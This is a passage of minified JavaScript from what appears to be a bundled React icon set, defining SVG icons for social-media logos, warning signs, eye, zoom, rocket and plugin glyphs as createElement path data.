8.527a3.383 3.383 0 0 1-3.18-2.231C6.307 7.467 4.6 10.002 4.6 13c0 .301.017.598.05.889a3.385 3.385 0 0 1 3.363 3.388c0 .63-.172 1.221-.471 1.727A7.322 7.322 0 0 0 12 20.5a7.321 7.321 0 0 0 4.458-1.495 3.384 3.384 0 0 1-.47-1.728 3.385 3.385 0 0 1 3.361-3.388c.034-.291.05-.588.05-.889Z",clipRule:"evenodd"})),square_rounded_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19V5A2.75 2.75 0 0 1 5 2.25h14A2.75 2.75 0 0 1 21.75 5v14Z"})),star_rating_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M10.3 2.793c.67-1.443 2.73-1.443 3.4 0l2.136 4.602a.294.294 0 0 0 .232.166l5.068.596c1.578.186 2.232 2.136 1.05 3.222l-3.748 3.444a.28.28 0 0 0-.087.261l.995 4.975c.315 1.574-1.369 2.76-2.75 1.99l-4.45-2.474a.3.3 0 0 0-.291 0l-4.45 2.475c-1.382.768-3.065-.417-2.75-1.991l.995-4.975a.28.28 0 0 0-.087-.26l-3.748-3.445c-1.182-1.086-.529-3.036 1.05-3.222l5.067-.596a.293.293 0 0 0 .232-.166L10.3 2.793Z"})),stopwatch_reading_time_timer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15 1.5a1 1 0 0 0-1-1h-4a1 1 0 1 0 0 2h1v.8c-4.915.502-8.75 4.653-8.75 9.7 0 5.385 4.365 9.75 9.75 9.75s9.75-4.365 9.75-9.75c0-5.047-3.835-9.198-8.75-9.7v-.8h1a1 1 0 0 0 1-1Zm-4 6a1 1 0 1 1 2 0v4.985l3.081 2.202.08.063a1 1 0 0 1-1.156 1.62l-.086-.056-3.5-2.5A1 1 0 0 1 11 13V7.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M18.293 3.293a1 1 0 0 1 1.414 0l2 2 .068.076a1 1 0 0 1-1.406 1.406l-.076-.068-2-2a1 1 0 0 1 0-1.414Z"})),tablet_ipad_pad_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M18 22.75A2.75 2.75 0 0 0 20.75 20V4A2.75 2.75 0 0 0 18 1.25H6A2.75 2.75 0 0 0 3.25 4v16A2.75 2.75 0 0 0 6 22.75h12ZM12.01 4a1 1 0 1 1 0 2C11.457 6 11 5.552 11 5s.457-1 1.01-1Z",clipRule:"evenodd"})),tag_bookmark_save_favourite_mark_discount_solid_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M20.75 22a.75.75 0 0 1-1.2.6l-6.8-5.1a1.25 1.25 0 0 0-1.415-.059l-.085.059-6.8 5.1a.75.75 0 0 1-1.2-.6V4A2.75 2.75 0 0 1 6 1.25h12A2.75 2.75 0 0 1 20.75 4v18Z"})),tiktok_logo_icon_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm2.364 5.25a1 1 0 1 0-2 0v7.792a2.195 2.195 0 0 1-2.182 2.208A2.195 2.195 0 0 1 8 14.292c0-1.228.985-2.209 2.182-2.209a1 1 0 1 0 0-2C7.864 10.083 6 11.975 6 14.292c0 2.316 1.864 4.208 4.182 4.208 2.317 0 4.182-1.892 4.182-4.208V9.934a4.74 4.74 0 0 0 2.636.774 1 1 0 1 0 0-2c-1.713 0-2.636-1.377-2.636-2.208Z",clipRule:"evenodd"})),tiktok_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 21.75A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14ZM6 14.292c0-2.316 1.864-4.209 4.182-4.209a1 1 0 0 1 0 2c-1.197 0-2.182.982-2.182 2.209s.985 2.208 2.182 2.208 2.181-.98 2.181-2.208V6.5a1 1 0 0 1 2 0c0 .83.924 2.208 2.637 2.208a1 1 0 0 1 0 2 4.738 4.738 0 0 1-2.637-.776v4.36c0 2.316-1.864 4.208-4.181 4.208C7.864 18.5 6 16.608 6 14.292Z",clipRule:"evenodd"})),triangle_rounded_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632Z",clipRule:"evenodd"})),triangle_shape_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 2.25a.75.75 0 0 1 .646.37l10 17A.75.75 0 0 1 22 20.75H2a.75.75 0 0 1-.646-1.13l10-17A.75.75 0 0 1 12 2.25Z",clipRule:"evenodd"})),twitter_x_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20.292 2.293a1.001 1.001 0 0 1 1.415 1.414l-7.125 7.124 7.026 9.73A.751.751 0 0 1 21 21.75h-5a.751.751 0 0 1-.608-.311l-4.789-6.63-6.896 6.897a1 1 0 0 1-1.414-1.415l7.124-7.125L2.392 3.44A.751.751 0 0 1 3 2.25h5l.09.005a.751.751 0 0 1 .518.306l4.787 6.628 6.897-6.896Z",clipRule:"evenodd"})),upload_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.47 12.47a.75.75 0 0 1 1.06 0l2.5 2.5a.75.75 0 0 1-.53 1.28h-1.75V21a.75.75 0 0 1-1.5 0v-4.75H9.5a.75.75 0 0 1-.53-1.28l2.5-2.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m23.67 11.663-.015-.03-.032-.06-.007-.013a18.339 18.339 0 0 0-.72-1.217 20.43 20.43 0 0 0-2.224-2.856C18.733 5.42 15.799 3.25 12 3.25c-3.8 0-6.734 2.17-8.672 4.237a20.43 20.43 0 0 0-2.796 3.801 11.69 11.69 0 0 0-.149.272l-.007.014-.032.06-.015.03a.76.76 0 0 0 0 .673l.015.03.032.06.007.013a18.262 18.262 0 0 0 .72 1.217 20.432 20.432 0 0 0 2.225 2.856C5.266 18.58 8.2 20.75 12 20.75c3.8 0 6.733-2.17 8.672-4.237a20.433 20.433 0 0 0 2.795-3.801c.065-.115.115-.208.149-.272l.007-.013.02-.037.012-.024.015-.03a.756.756 0 0 0 0-.673ZM12 5.75a4.25 4.25 0 1 1 0 8.5 4.25 4.25 0 0 1 0-8.5Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m.33 11.664.015-.03.032-.06.007-.014a18.263 18.263 0 0 1 .72-1.217 20.43 20.43 0 0 1 2.224-2.856C5.268 5.42 8.201 3.25 12 3.25c3.8 0 6.734 2.17 8.672 4.237a20.425 20.425 0 0 1 2.796 3.801c.065.115.115.208.149.272l.007.014.032.06.014.03a.75.75 0 0 1 .001.672l-.015.03a5.739 5.739 0 0 1-.032.06l-.007.014a18.252 18.252 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.225 2.856C18.734 18.58 15.8 20.75 12 20.75c-3.8 0-6.733-2.17-8.671-4.237a20.432 20.432 0 0 1-2.796-3.801 12.06 12.06 0 0 1-.149-.272l-.007-.013-.032-.06-.015-.03a.756.756 0 0 1 0-.673ZM15.75 12a3.75 3.75 0 1 1-7.5 0 3.75 3.75 0 0 1 7.5 0Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M23.616 11.573C20.503 7.077 16.29 4.75 12 4.75c-4.291 0-8.504 2.327-11.617 6.823a.75.75 0 0 0 0 .854C3.496 16.922 7.71 19.25 12 19.25c4.29 0 8.503-2.328 11.616-6.823a.75.75 0 0 0 0-.854ZM17.25 12a5.25 5.25 0 1 0-10.5 0 5.25 5.25 0 0 0 10.5 0Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M14.25 12A2.25 2.25 0 0 0 12 9.75a.75.75 0 0 1 0-1.5A3.75 3.75 0 0 1 15.75 12a.75.75 0 0 1-1.5 0Z"})),view_count_show_visible_eye_open_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M14.25 10a1.75 1.75 0 0 0 3.366.673l.049-.098a.751.751 0 0 1 1.318.06 7.75 7.75 0 1 1-3.62-3.62.75.75 0 0 1-.036 1.369A1.751 1.751 0 0 0 14.25 10Z"}),(0,a.createElement)("path",{d:"M12 2c4.335 0 8.706 2.263 10.89 6.546a1 1 0 1 1-1.78.908C19.301 5.911 15.664 4 12 4 8.335 4 4.698 5.911 2.89 9.454a1 1 0 0 1-1.78-.908C3.293 4.263 7.664 2 12 2Z"})),view_count_show_visible_eye_open_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 12H12V7.25A4.75 4.75 0 1 0 16.75 12Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"m23.167 12.083.727.364c.141-.281.14-.613 0-.895l-.002-.003-.003-.007-.011-.022a10.615 10.615 0 0 0-.192-.354 20.675 20.675 0 0 0-2.831-3.85C18.895 5.226 15.899 3 12 3 8.1 3 5.104 5.226 3.145 7.316a20.674 20.674 0 0 0-2.831 3.85 12.375 12.375 0 0 0-.192.354l-.011.022-.003.007-.002.002s0 .002.894.449l-.894-.447a1 1 0 0 0 0 .894l.002.004.003.007.011.022a8.267 8.267 0 0 0 .192.354 20.67 20.67 0 0 0 2.831 3.85C5.105 18.774 8.1 21 12 21c3.9 0 6.895-2.226 8.855-4.316a20.672 20.672 0 0 0 2.831-3.85 11.81 11.81 0 0 0 .175-.322l.017-.032.011-.022.003-.007.002-.002s0-.002-.727-.366Zm-.096-.119.823-.412-.823.412ZM12 5a7 7 0 1 0 0 14 7 7 0 0 0 0-14Z",clipRule:"evenodd"})),warning_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM13 8a1 1 0 1 0-2 0v4a1 1 0 1 0 2 0V8Zm-1 6.75a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5Z",clipRule:"evenodd"})),warning_triangle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632ZM11 9v4a1 1 0 1 0 2 0V9a1 1 0 1 0-2 0Zm0 7.5v.5a1 1 0 1 0 2 0v-.5a1 1 0 1 0-2 0Z",clipRule:"evenodd"})),whatsapp_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 1.802.444 3.501 1.228 4.994l-1.206 4.824a.75.75 0 0 0 .91.91l4.824-1.206A10.706 10.706 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Zm3.16 12.04c.245.09 1.56.733 1.828.866v.001l.145.071c.187.09.313.151.367.24.067.111.067.645-.156 1.266-.223.622-1.292 1.19-1.805 1.266-.461.069-1.044.097-1.685-.106a15.383 15.383 0 0 1-1.525-.56c-2.506-1.078-4.2-3.495-4.522-3.954l-.047-.066-.002-.002c-.14-.186-1.09-1.447-1.09-2.752 0-1.226.605-1.87.883-2.165l.053-.056a.984.984 0 0 1 .713-.333c.179 0 .357.002.513.01h.06c.156 0 .35-.001.541.456.078.185.193.463.313.753.225.547.469 1.137.512 1.224.067.133.112.288.022.466l-.039.08a1.49 1.49 0 0 1-.228.364l-.14.166c-.09.111-.182.222-.261.3-.134.133-.273.277-.117.544.156.266.692 1.138 1.488 1.844a6.905 6.905 0 0 0 1.973 1.241c.074.032.134.058.178.08.267.133.423.111.58-.067.155-.177.668-.777.846-1.043.178-.267.357-.223.602-.134Z",clipRule:"evenodd"})),wordpress_logo_icon_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2.778 12a9.225 9.225 0 0 0 5.198 8.3l-4.4-12.054A9.18 9.18 0 0 0 2.779 12Zm15.447-.465c0-1.139-.409-1.929-.76-2.543-.466-.76-.905-1.402-.905-2.162 0-.847.642-1.637 1.548-1.637.04 0 .079.005.119.007A9.185 9.185 0 0 0 12 2.778a9.21 9.21 0 0 0-7.705 4.158c.216.007.421.01.593.01.965 0 2.458-.117 2.458-.117.497-.03.557.7.06.76 0 0-.5.057-1.055.087l3.359 9.988 2.018-6.052-1.437-3.936c-.497-.03-.967-.088-.967-.088-.497-.03-.439-.79.058-.76 0 0 1.523.118 2.428.118.965 0 2.458-.117 2.458-.117.497-.03.557.7.06.76 0 0-.5.057-1.054.087l3.332 9.913.92-3.074c.398-1.276.701-2.192.701-2.982l-.002.002Z"}),(0,a.createElement)("path",{d:"m12.16 12.807-2.766 8.04a9.25 9.25 0 0 0 5.667-.147.719.719 0 0 1-.065-.126l-2.835-7.767Zm7.931-5.231c.04.293.062.61.062.948 0 .935-.176 1.988-.702 3.302l-2.816 8.145a9.22 9.22 0 0 0 4.585-7.973 9.157 9.157 0 0 0-1.13-4.424l.002.002Z"}),(0,a.createElement)("path",{d:"M12 1.25C6.071 1.25 1.25 6.072 1.25 12S6.072 22.75 12 22.75c5.926 0 10.748-4.822 10.748-10.75C22.75 6.072 17.926 1.25 12 1.25Zm0 21.007c-5.656 0-10.257-4.601-10.257-10.259 0-5.657 4.6-10.255 10.256-10.255 5.655 0 10.256 4.601 10.256 10.257S17.655 22.259 12 22.259v-.002Z"})),wordpress_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 1.25C6.075 1.25 1.25 6.074 1.25 12c0 5.928 4.824 10.75 10.75 10.75 5.928 0 10.75-4.822 10.75-10.75 0-5.926-4.822-10.75-10.75-10.75ZM2.336 12c0-1.4.302-2.732.837-3.933l4.61 12.63a9.665 9.665 0 0 1-5.447-8.696Zm9.666 9.665a9.629 9.629 0 0 1-2.731-.394l2.9-8.426 2.97 8.14c.02.047.044.091.07.132a9.655 9.655 0 0 1-3.21.548Zm1.33-14.195a19.275 19.275 0 0 0 1.106-.094c.522-.06.46-.826-.061-.795 0 0-1.565.122-2.577.122-.949 0-2.545-.122-2.545-.122-.52-.03-.583.765-.06.795 0 0 .492.062 1.013.094l1.506 4.125-2.117 6.342L6.08 7.47a20.357 20.357 0 0 0 1.106-.092c.52-.063.46-.828-.063-.797 0 0-1.563.122-2.575.122-.182 0-.395-.004-.621-.011A9.651 9.651 0 0 1 12 2.335a9.63 9.63 0 0 1 6.527 2.538c-.043-.002-.083-.007-.127-.007-.95 0-1.622.825-1.622 1.715 0 .795.46 1.47.949 2.266.367.644.796 1.471.796 2.665 0 .827-.316 1.787-.736 3.124l-.963 3.222L13.332 7.47Zm3.528 12.884 2.951-8.535c.552-1.38.734-2.481.734-3.461 0-.357-.022-.686-.064-.995A9.608 9.608 0 0 1 21.665 12a9.661 9.661 0 0 1-4.805 8.353Z"})),youtube_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.29 3.608c-3.693-.479-10.531-.477-14.402.003-1.874.233-3.194 1.843-3.41 3.831-.304 2.773-.304 6.343 0 9.116.216 1.988 1.536 3.598 3.41 3.83 3.87.481 10.71.483 14.401.004 1.784-.232 2.995-1.77 3.21-3.63.334-2.868.334-6.656 0-9.524-.215-1.86-1.426-3.398-3.21-3.63Zm-8.904 4.749A.75.75 0 0 0 9.25 9v6a.75.75 0 0 0 1.136.643l5-3a.75.75 0 0 0 0-1.286l-5-3Z",clipRule:"evenodd"})),full_screen_corners_out_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M2 8.5V5C2 3.34315 3.34315 2 5 2H8.5C9.05228 2 9.5 2.44772 9.5 3C9.5 3.55228 9.05228 4 8.5 4H5C4.44772 4 4 4.44772 4 5V8.5C4 9.05228 3.55228 9.5 3 9.5C2.44772 9.5 2 9.05228 2 8.5Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M2 19V15.5C2 14.9477 2.44772 14.5 3 14.5C3.55228 14.5 4 14.9477 4 15.5V19C4 19.5523 4.44772 20 5 20H8.5C9.05228 20 9.5 20.4477 9.5 21C9.5 21.5523 9.05228 22 8.5 22H5C3.34315 22 2 20.6569 2 19Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M20 8V5C20 4.44772 19.5523 4 19 4H15.5C14.9477 4 14.5 3.55228 14.5 3C14.5 2.44772 14.9477 2 15.5 2H19C20.6569 2 22 3.34315 22 5V8C22 8.55228 21.5523 9 21 9C20.4477 9 20 8.55228 20 8Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M20 19V15.5C20 14.9477 20.4477 14.5 21 14.5C21.5523 14.5 22 14.9477 22 15.5V19C22 20.6569 20.6569 22 19 22H15.5C14.9477 22 14.5 21.5523 14.5 21C14.5 20.4477 14.9477 20 15.5 20H19C19.5523 20 20 19.5523 20 19Z",fill:"currentColor"})),zoom_in_magnifying_glass_plus_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11 2C15.9706 2 20 6.02944 20 11C20 13.125 19.2619 15.0766 18.0303 16.6162L21.707 20.293C22.0972 20.6835 22.0974 21.3166 21.707 21.707C21.3166 22.0974 20.6835 22.0972 20.293 21.707L16.6162 18.0303C15.0766 19.2619 13.125 20 11 20C6.02944 20 2 15.9706 2 11C2 6.02944 6.02944 2 11 2ZM11 4C7.13401 4 4 7.13401 4 11C4 14.866 7.13401 18 11 18C12.89 18 14.6038 17.2497 15.8633 16.0322C15.8877 16.0012 15.9148 15.9719 15.9434 15.9434C15.9719 15.9148 16.0012 15.8877 16.0322 15.8633C17.2497 14.6038 18 12.89 18 11C18 7.13401 14.866 4 11 4Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M9.99512 14V12.0049H8C7.44772 12.0049 7 11.5572 7 11.0049C7.00007 10.4527 7.44776 10.0049 8 10.0049H9.99512V8C9.99512 7.44772 10.4428 7 10.9951 7C11.5473 7.00007 11.9951 7.44776 11.9951 8V10.0049H14C14.5522 10.0049 14.9999 10.4527 15 11.0049C15 11.5572 14.5523 12.0049 14 12.0049H11.9951V14C11.9951 14.5522 11.5473 14.9999 10.9951 15C10.4428 15 9.99512 14.5523 9.99512 14Z",fill:"currentColor"})),zoom_out_magnifying_glass_minus_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11 2C15.9706 2 20 6.02944 20 11C20 13.125 19.2619 15.0766 18.0303 16.6162L21.707 20.293C22.0972 20.6835 22.0974 21.3166 21.707 21.707C21.3166 22.0974 20.6835 22.0972 20.293 21.707L16.6162 18.0303C15.0766 19.2619 13.125 20 11 20C6.02944 20 2 15.9706 2 11C2 6.02944 6.02944 2 11 2ZM11 4C7.13401 4 4 7.13401 4 11C4 14.866 7.13401 18 11 18C12.89 18 14.6038 17.2497 15.8633 16.0322C15.8877 16.0012 15.9148 15.9719 15.9434 15.9434C15.9719 15.9148 16.0012 15.8877 16.0322 15.8633C17.2497 14.6038 18 12.89 18 11C18 7.13401 14.866 4 11 4Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M14 10.005C14.5523 10.005 15 10.4527 15 11.005C15 11.5573 14.5523 12.005 14 12.005H8C7.44772 12.005 7 11.5573 7 11.005C7 10.4527 7.44772 10.005 8 10.005H14Z",fill:"currentColor"})),gallery_indicator_image_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M16.75 7C16.75 8.10457 15.8546 9 14.75 9C13.6454 9 12.75 8.10457 12.75 7C12.75 5.89543 13.6454 5 14.75 5C15.8546 5 16.75 5.89543 16.75 7Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M6.5 18.5C6.5 18.3619 6.38807 18.25 6.25 18.25H4C3.86193 18.25 3.75 18.3619 3.75 18.5V20C3.75 20.1381 3.86193 20.25 4 20.25H6.25C6.38807 20.25 6.5 20.1381 6.5 20V18.5ZM8 20C8 20.9665 7.2165 21.75 6.25 21.75H4C3.0335 21.75 2.25 20.9665 2.25 20V18.5C2.25 17.5335 3.0335 16.75 4 16.75H6.25C7.2165 16.75 8 17.5335 8 18.5V20Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M13.5 18.5C13.5 18.3619 13.3881 18.25 13.25 18.25H11C10.8619 18.25 10.75 18.3619 10.75 18.5V20C10.75 20.1381 10.8619 20.25 11 20.25H13.25C13.3881 20.25 13.5 20.1381 13.5 20V18.5ZM15 20C15 20.9665 14.2165 21.75 13.25 21.75H11C10.0335 21.75 9.25 20.9665 9.25 20V18.5C9.25 17.5335 10.0335 16.75 11 16.75H13.25C14.2165 16.75 15 17.5335 15 18.5V20Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M20.25 18.5C20.25 18.3619 20.1381 18.25 20 18.25H18C17.8619 18.25 17.75 18.3619 17.75 18.5V20C17.75 20.1381 17.8619 20.25 18 20.25H20C20.1381 20.25 20.25 20.1381 20.25 20V18.5ZM21.75 20C21.75 20.9665 20.9665 21.75 20 21.75H18C17.0335 21.75 16.25 20.9665 16.25 20V18.5C16.25 17.5335 17.0335 16.75 18 16.75H20C20.9665 16.75 21.75 17.5335 21.75 18.5V20Z",fill:"currentColor"}),(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M19 15.75C20.5188 15.75 21.75 14.5188 21.75 13V5C21.75 3.4812 20.5188 2.25 19 2.25H5C3.4812 2.25 2.25 3.4812 2.25 5V13C2.25 14.5188 3.4812 15.75 5 15.75H19ZM3.75 11.8613V5C3.75 4.30957 4.30963 3.75 5 3.75H19C19.6904 3.75 20.25 4.30957 20.25 5V10.8613L19.9442 10.5557C18.8703 9.48169 17.1295 9.48169 16.0555 10.5557L15.3837 11.2266C14.8956 11.7146 14.1042 11.7146 13.6161 11.2266L10.9442 8.55566C9.8703 7.48169 8.12946 7.48169 7.05554 8.55566L3.75 11.8613Z",fill:"currentColor"})),rocket_fly_boost_launch_pro_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M7.79289 14.7929C8.18342 14.4024 8.81643 14.4024 9.20696 14.7929C9.59748 15.1834 9.59748 15.8164 9.20696 16.207L4.20696 21.207C3.81643 21.5975 3.18342 21.5975 2.79289 21.207C2.40237 20.8164 2.40237 20.1834 2.79289 19.7929L7.79289 14.7929Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M10.2929 17.2929C10.6834 16.9024 11.3164 16.9024 11.707 17.2929C12.0975 17.6834 12.0975 18.3164 11.707 18.707L9.70696 20.707C9.31643 21.0975 8.68342 21.0975 8.29289 20.707C7.90237 20.3164 7.90237 19.6834 8.29289 19.2929L10.2929 17.2929Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M5.29289 12.2929C5.68342 11.9024 6.31643 11.9024 6.70696 12.2929C7.09748 12.6834 7.09748 13.3164 6.70696 13.707L4.70696 15.707C4.31643 16.0975 3.68342 16.0975 3.29289 15.707C2.90237 15.3164 2.90237 14.6834 3.29289 14.2929L5.29289 12.2929Z",fill:"currentColor"}),(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.5002 1.75C21.9145 1.75 22.2502 2.08569 22.2502 2.5V3.10059C22.2502 5.88916 21.0051 8.88525 19.2672 11.1758L19.7473 16.9375C19.7656 17.1575 19.6865 17.3743 19.5305 17.5303L15.5305 21.5303C15.3439 21.717 15.0726 21.792 14.8167 21.7275C14.5609 21.6631 14.3574 21.4685 14.2815 21.2158L12.8049 16.2939L7.7063 11.1953L2.78442 9.71875C2.62842 9.67188 2.49463 9.57642 2.39984 9.4502C2.34113 9.37183 2.29742 9.28149 2.27271 9.18359C2.20819 8.92773 2.28333 8.65649 2.46997 8.46973L6.46997 4.46973L6.53149 4.41504C6.68048 4.29565 6.87042 4.23682 7.06274 4.25293L12.8245 4.73315C15.115 2.99512 18.111 1.75 20.8997 1.75H21.5002ZM19.0002 6.5C19.0002 7.32837 18.3287 8 17.5002 8C16.6718 8 16.0002 7.32837 16.0002 6.5C16.0002 5.67163 16.6718 5 17.5002 5C18.3287 5 19.0002 5.67163 19.0002 6.5Z",fill:"currentColor"})),plugin_connect_socket_integration_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M5.20699 8.79297L6.99995 10.5859L8.79292 8.79297C9.18343 8.40234 9.81642 8.40234 10.207 8.79297C10.5975 9.18335 10.5975 9.81641 10.207 10.207L8.41402 12L12 15.5859L13.7929 13.793C14.1834 13.4023 14.8164 13.4023 15.207 13.793C15.5975 14.1833 15.5975 14.8164 15.207 15.207L13.414 17L15.207 18.793C15.5975 19.1833 15.5975 19.8164 15.207 20.207C14.8164 20.5974 14.1834 20.5974 13.7929 20.207L12.8233 19.2375L10.9445 21.1162C9.87056 22.1902 8.12886 22.1902 7.05489 21.1162L5.67653 19.7375L3.20699 22.207C2.81642 22.5974 2.18343 22.5974 1.79292 22.207C1.40236 21.8164 1.40236 21.1833 1.79292 20.793L4.26265 18.3232L2.88405 16.9443C1.81007 15.8706 1.81007 14.1296 2.88405 13.0557L4.76277 11.177L3.79292 10.207C3.40236 9.81641 3.40236 9.18335 3.79292 8.79297C4.18343 8.40234 4.81642 8.40234 5.20699 8.79297Z",fill:"currentColor"}),(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11.1768 4.7627L10.207 3.79297C9.81641 3.40234 9.18341 3.40234 8.79291 3.79297C8.40234 4.18335 8.40234 4.81641 8.79291 5.20703L18.7929 15.207C19.1834 15.5974 19.8164 15.5974 20.207 15.207C20.5975 14.8164 20.5975 